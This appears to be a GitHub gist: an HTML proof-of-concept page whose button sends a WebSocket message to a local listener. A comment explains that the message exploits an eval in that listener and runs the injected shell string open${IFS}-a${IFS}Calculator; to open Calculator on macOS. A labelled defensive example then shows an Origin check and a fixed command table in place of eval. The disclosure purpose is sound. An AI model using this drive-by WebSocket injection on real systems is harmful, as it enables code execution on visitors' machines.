Last active Jan 31, 2022
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
<!doctype html>
<html lang="en" class="h-100">
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Bootstrap CSS -->
<link href="" rel="stylesheet" crossorigin="anonymous">
<title>RCE for the RCE</title>
* Globals
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
* Globals
/* Custom default button */
.btn-secondary:focus {
color: #333;
text-shadow: none; /* Prevent inheritance from `body` */
* Base structure
body {
text-shadow: 0 .05rem .1rem rgba(0, 0, 0, .5);
box-shadow: inset 0 0 5rem rgba(0, 0, 0, .5);
.cover-container {
max-width: 42em;
* Header
.nav-masthead .nav-link {
padding: .25rem 0;
font-weight: 700;
color: rgba(255, 255, 255, .5);
background-color: transparent;
border-bottom: .25rem solid transparent;
.nav-masthead .nav-link:hover,
.nav-masthead .nav-link:focus {
border-bottom-color: rgba(255, 255, 255, .25);
.nav-masthead .nav-link + .nav-link {
margin-left: 1rem;
.nav-masthead .active {
color: #fff;
border-bottom-color: #fff;
<body class="d-flex h-100 text-center text-white bg-dark">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="mb-auto">
<main class="px-3 text-end">
<h1 style="font-size: 90px; color:#0000;">MA</h1>
<h1 style="font-size: 80px">Matt Austin</h1>
<p class="lead" style="color:#d0e4f8; font-size: 1.5em;">RCE for the "RCE" V1.0 PoC iOS 15.0.1 (By Jonathan Scott)</br>
Developed by <a href="" class="text-white">Matt Austin</a></p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary fw-bold border-white bg-white" onclick="send()">► Start</a>
<footer class="mt-auto text-white-50">
<p>© ®2021 Matt Austin by <a href="" class="text-white">@mattaustin</a>.</p>
let socket = new WebSocket("ws://");
socket.onopen = function(e) {
console.log("[open] Connection established");
console.log("Sending to server");
socket.onmessage = function(event) {
console.log(`[message] Data received from server: ${}`);
socket.onclose = function(event) {
console.log('[close] Connection died');
socket.onerror = function(error) {
console.log(`[error] ${error.message}`);
function send(){
matt- commented Jan 3, 2022

@Hackdwerg Why not?

If you are running the fake RCE By Jonathan Scott from:
you can see that it calls an eval at:

If you view this page ( while running his exploit and click the button, it makes a WebSocket call at to exploit the eval and runs open${IFS}-a${IFS}Calculator; to open the Calculator on macOS.

If an attacker can create a website that executes code and makes system calls on your computer simply by viewing it, I consider it an RCE. Can you explain why you don't?
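
An added example, not part of the gist or of either author's code: a sketch of how a local WebSocket listener like the one described in the comment above could close both gaps, by checking the handshake Origin and by dispatching messages through a fixed command table instead of an eval. The allowed origin, the command names and the function names are assumptions made for illustration.

```javascript
// Added example; ALLOWED_ORIGINS, COMMANDS and both function names are hypothetical.
const ALLOWED_ORIGINS = new Set(["http://localhost:8080"]); // constructed value

// Browsers send an Origin header with every WebSocket handshake, but the
// same-origin policy does not stop a page from connecting, so the listener
// checks it itself. Header names are lowercased, as Node's http module does.
function isAllowedOrigin(headers) {
  const origin = headers["origin"];
  return typeof origin === "string" && ALLOWED_ORIGINS.has(origin);
}

// Fixed command table: a message only selects a handler by name. Nothing in
// the message is evaluated as code or handed to a shell.
const COMMANDS = {
  ping: () => ({ ok: true, result: "pong" }),
  echo: (args) => ({ ok: true, result: String(args.text ?? "").slice(0, 256) }),
};

function handleMessage(raw) {
  if (typeof raw !== "string" || raw.length > 4096) {
    return { ok: false, error: "bad frame" };
  }
  let msg;
  try {
    msg = JSON.parse(raw);
  } catch {
    return { ok: false, error: "not JSON" };
  }
  if (msg === null || typeof msg !== "object" || Array.isArray(msg)) {
    return { ok: false, error: "bad message" };
  }
  // Own-property lookup keeps names like "constructor" from resolving to
  // members inherited from Object.prototype.
  const known = Object.prototype.hasOwnProperty.call(COMMANDS, msg.cmd);
  if (typeof msg.cmd !== "string" || !known) {
    return { ok: false, error: "unknown command" };
  }
  const args = msg.args !== null && typeof msg.args === "object" ? msg.args : {};
  return COMMANDS[msg.cmd](args);
}

// Constructed sample frames; the second is the string quoted in the comment.
const samples = ['{"cmd":"ping"}', "open${IFS}-a${IFS}Calculator;", '{"cmd":"constructor"}'];
for (const s of samples) console.log(JSON.stringify(handleMessage(s)));
console.log(isAllowedOrigin({ origin: "https://attacker.example" }));
```

A real listener would call `isAllowedOrigin` during the HTTP upgrade and refuse the handshake before any frame is read.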
